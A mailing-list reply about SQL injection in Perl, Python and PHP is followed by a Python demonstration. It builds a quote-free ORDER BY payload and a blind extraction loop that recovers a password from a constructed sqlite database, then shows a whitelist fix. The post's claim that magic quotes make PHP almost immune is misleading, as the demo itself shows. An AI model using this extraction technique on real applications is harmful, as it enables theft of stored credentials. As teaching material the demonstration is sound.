John Bokma wrote:
my $sort = $cgi->param( "sort" );
my $query = "SELECT * FROM table WHERE id=? ORDER BY $sort";
And the equivalent Python code:
cursor.execute('SELECT * FROM table WHERE id=%%s ORDER BY %s' % sort, [some_id])
You're right, of course, about being *able* to write code with SQL injection vulnerabilities in Python. But it's not even close to being as easy as in PHP.
I'm bewildered why you haven't mentioned magic quotes. A one line change to the configuration file can render your PHP site almost entirely immune to SQL injection attacks.
-Peter
-- Pull out a splinter to reply. -- http://mail.python.org/mailman/listinfo/python-list
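The ORDER BY pattern from the quoted snippets, worked through as an added example (not code from either poster). It assumes Python's sqlite3 with two constructed in-memory tables, `items` and `users`, and a small `addslashes` emulation standing in for what magic_quotes_gpc does to request data. The sort value is never inside quotes in the query, so a payload that contains no quote characters passes quote-escaping untouched; here the attacker-chosen expression flips the row order depending on a character of a password in another table, and the order becomes a blind oracle. The hardened version maps the user's choice to a fixed identifier, because DB-API placeholders bind values, not column names:

```python
import re
import sqlite3

# Constructed sample data (not from the original post): a catalogue and a users table.
FRUIT_BY_ID = ["plum", "apple", "mango"]   # insertion / id order
FRUIT_BY_NAME = sorted(FRUIT_BY_ID)         # alphabetical order, deliberately different


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, category TEXT, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)",
                     [(i + 1, "fruit", n) for i, n in enumerate(FRUIT_BY_ID)])
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")
    return conn


def fetch_vulnerable(conn, category, sort):
    """Same shape as the query in the post: bound value, interpolated ORDER BY."""
    query = "SELECT id, name FROM items WHERE category=? ORDER BY %s" % sort
    return conn.execute(query, [category]).fetchall()


def addslashes(s):
    """Approximation of PHP's magic_quotes_gpc: backslash-escape ' " \\ and NUL."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


def build_payload(pos, code):
    """ORDER BY expression that sorts by id when character `pos` of the admin
    password has code point `code`, and by name otherwise.  It contains no
    quote characters, so addslashes() leaves it exactly as it is."""
    return ("(CASE WHEN (SELECT unicode(substr(password,%d,1)) FROM users WHERE id=1)=%d "
            "THEN id ELSE name END)" % (pos, code))


def leak_char(conn, pos):
    """Blind extraction: the order the rows come back in is the oracle."""
    for code in range(32, 127):
        rows = fetch_vulnerable(conn, "fruit", addslashes(build_payload(pos, code)))
        if [name for _, name in rows] == FRUIT_BY_ID:
            return chr(code)
    return None


# Hardened form: user input selects from a fixed map of identifiers; nothing
# from the request is ever spliced into the SQL text.
ALLOWED_SORT = {"id": "id", "name": "name"}


def fetch_hardened(conn, category, sort):
    if sort not in ALLOWED_SORT:
        raise ValueError("unsupported sort column: %r" % (sort,))
    query = "SELECT id, name FROM items WHERE category=? ORDER BY %s" % ALLOWED_SORT[sort]
    return conn.execute(query, [category]).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Spells out the admin password one character at a time via the vulnerable query.
    print("".join(leak_char(db, p) for p in range(1, 7)))
    print(fetch_hardened(db, "fruit", "name"))
```

The same whitelist approach applies to the Perl version: look `$sort` up in a hash of permitted column names before interpolating it, and reject anything else.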